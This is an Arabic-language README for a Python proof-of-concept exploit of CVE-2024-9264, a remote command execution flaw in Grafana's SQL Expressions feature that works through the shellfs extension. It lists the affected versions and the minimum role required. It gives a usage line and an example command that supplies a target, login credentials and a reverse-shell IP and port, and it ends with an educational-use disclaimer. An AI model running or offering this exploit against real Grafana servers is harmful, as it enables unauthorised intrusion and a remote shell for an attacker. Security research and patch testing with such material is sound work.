
إثبات مفهوم بلغة Python لتنفيذ تعليمات برمجية عن بُعد في Grafana عبر SQL Expressions، يستغل عدم كفاية تعقيم المدخلات لتنفيذ أوامر شل تعسفية على أهداف مصادق عليها.
إثبات المفهوم لتنفيذ الأوامر عن بُعد في Grafana (CVE-2024-9264)
يحتوي هذا المستودع على سكريبت بلغة بايثون يستغل ثغرة تنفيذ الأوامر عن بُعد (RCE) في ميزة تعبيرات SQL في Grafana. من خلال استغلال عدم كفاية تنقية الإدخال، يسمح هذا الاستغلال للمهاجم بتنفيذ أوامر شل عشوائية على الخادم. يتم ذلك بفضل امتداد shellfs المجتمعي، الذي يمكن للمهاجم تثبيته وتحميله لتسهيل تنفيذ الأوامر.
Viewer أو أعلىGrafana >= الإصدار v11.0.0 (جميع إصدارات v11.x.y متأثرة)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
هذا السكريبت مخصص للأغراض التعليمية وللاستخدام في بيئات خاضعة للرقابة حيث لديك الإذن لاختبار أمان النظام. إساءة استخدام هذه الأداة قد تؤدي إلى عواقب قانونية.